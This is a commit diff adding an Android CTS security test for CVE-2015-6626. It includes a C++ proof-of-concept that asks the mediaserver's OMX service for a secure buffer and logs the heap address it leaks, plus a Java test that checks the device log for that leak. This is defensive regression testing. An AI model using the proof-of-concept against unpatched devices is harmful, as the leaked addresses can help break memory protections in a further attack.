Merge changes from topic "am-9fed7762-1c53-4647-9bc3-1e1194c37b76" into nyc-dr1-dev
* changes:
[automerger] [RESTRICT AUTOMERGE]: CTS test for Android Security b/72508263 b/27597103 am: 10c66eee16
[RESTRICT AUTOMERGE]: CTS test for Android Security b/72508263 b/27597103
diff --git a/hostsidetests/security/AndroidTest.xml b/hostsidetests/security/AndroidTest.xml
index 012a585..f6e4b47 100755
--- a/hostsidetests/security/AndroidTest.xml
+++ b/hostsidetests/security/AndroidTest.xml
@@ -37,6 +37,11 @@
<option name="push" value="CVE-2016-2504->/data/local/tmp/CVE-2016-2504" />
<!--__________________-->
+ <!-- Bulletin 2015-12 -->
+ <!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+ <option name="push" value="CVE-2015-6626->/data/local/tmp/CVE-2015-6626" />
+
+ <!--__________________-->
<!-- Bulletin 2016-04 -->
<!-- Please add tests solely from this bulletin below to avoid merge conflict -->
<option name="push" value="CVE-2016-2419->/data/local/tmp/CVE-2016-2419" />
diff --git a/hostsidetests/security/securityPatch/CVE-2015-6626/Android.mk b/hostsidetests/security/securityPatch/CVE-2015-6626/Android.mk
new file mode 100755
index 0000000..4988787
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2015-6626/Android.mk
@@ -0,0 +1,45 @@
+# Copyright (C) 2018 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH:= $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2015-6626
+LOCAL_SRC_FILES := poc.cpp
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+LOCAL_C_INCLUDES := $(JNI_H_INCLUDE) \
+ $(TOP)/frameworks/native/include/media/openmax \
+ ndk/sources/cpufeatures
+
+LOCAL_SHARED_LIBRARIES := libnativehelper \
+ liblog \
+ libbinder \
+ libutils \
+ libmedia \
+ libdl \
+ libcutils \
+ libstagefright_foundation
+
+LOCAL_STATIC_LIBRARIES := cpufeatures
+LOCAL_COMPATIBILITY_SUITE := cts sts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -Werror
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2015-6626/poc.cpp b/hostsidetests/security/securityPatch/CVE-2015-6626/poc.cpp
new file mode 100755
index 0000000..4568073
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2015-6626/poc.cpp
@@ -0,0 +1,107 @@
+/*
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+#include <OMX_Component.h>
+#include <binder/IServiceManager.h>
+#include <binder/MemoryDealer.h>
+#include <jni.h>
+#include <media/IMediaPlayerService.h>
+#include <media/IOMX.h>
+#include <utils/NativeHandle.h>
+
+using namespace android;
+
+template <class T> static void InitOMXParams(T *params) {
+ params->nSize = sizeof(T);
+ params->nVersion.s.nVersionMajor = 1;
+ params->nVersion.s.nVersionMinor = 0;
+ params->nVersion.s.nRevision = 0;
+ params->nVersion.s.nStep = 0;
+}
+
+struct DummyOMXObserver : public BnOMXObserver {
+public:
+ DummyOMXObserver() {}
+
+ virtual void onMessages(const std::list<omx_message> &messages __unused) {}
+
+protected:
+ virtual ~DummyOMXObserver() {}
+};
+
+static bool connectOMX(sp<IOMX> &omx) {
+ sp<IServiceManager> sm = defaultServiceManager();
+
+ sp<IBinder> binder = sm->getService(String16("media.player"));
+ sp<IMediaPlayerService> mediaPlayerService =
+ interface_cast<IMediaPlayerService>(binder);
+
+ if (mediaPlayerService == NULL) {
+ ALOGE("cannot get the media player service");
+ return false;
+ }
+
+ omx = mediaPlayerService->getOMX();
+ if (omx == NULL) {
+ ALOGE("cannot get the OMX interface");
+ return false;
+ }
+
+ return true;
+}
+
+int doExp() {
+
+ sp<IServiceManager> sm = defaultServiceManager();
+ sp<IBinder> binder = sm->getService(String16("media.player"));
+ sp<IMediaPlayerService> mps = interface_cast<IMediaPlayerService>(binder);
+
+ if (mps == NULL) {
+ ALOGI("get media player service failed");
+ return 0;
+ }
+
+ const char *codecName = "OMX.google.mp3.decoder";
+ // connect to IOMX each time
+ sp<IOMX> service = mps->getOMX();
+
+ IOMX::node_id node = 0;
+ sp<DummyOMXObserver> observer = new DummyOMXObserver();
+ status_t err = service->allocateNode(codecName, observer, NULL, &node);
+ if (err != OK) {
+ ALOGI("%s node allocation fails", codecName);
+ return 0;
+ }
+ // allocate buffer
+ void *buffer_data = NULL;
+ IOMX::buffer_id bufferid = 0;
+ sp<NativeHandle> native_handle;
+ err = service->allocateSecureBuffer(node, 0, 4096, &bufferid, &buffer_data,&native_handle);
+ ALOGE("%x,%p\n", bufferid, buffer_data); // bufferid and buffer_data
+ // leak the heap address of the
+ // mediaserver
+
+ if (buffer_data != NULL || bufferid != 0) {
+ ALOGE("Media buffer information leak");
+ }
+ return 1;
+}
+
+int main() {
+ int ret = doExp();
+ return ret;
+}
\ No newline at end of file
diff --git a/hostsidetests/security/src/android/security/cts/Poc15_12.java b/hostsidetests/security/src/android/security/cts/Poc15_12.java
new file mode 100755
index 0000000..e8d60ba
--- /dev/null
+++ b/hostsidetests/security/src/android/security/cts/Poc15_12.java
@@ -0,0 +1,32 @@
+/**
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+
+public class Poc15_12 extends SecurityTestCase {
+ /**
+ * b/24310423
+ */
+ @SecurityTest
+ public void testPocCVE_2015_6626() throws Exception {
+ AdbUtils.runCommandLine("logcat -c" , getDevice());
+ AdbUtils.runPoc("CVE-2015-6626", getDevice(), 60);
+ String logcat = AdbUtils.runCommandLine("logcat -d", getDevice());
+ assertNotMatches("[\\s\\n\\S]*Media buffer information leak[\\s\\n\\S]*", logcat);
+ }
+}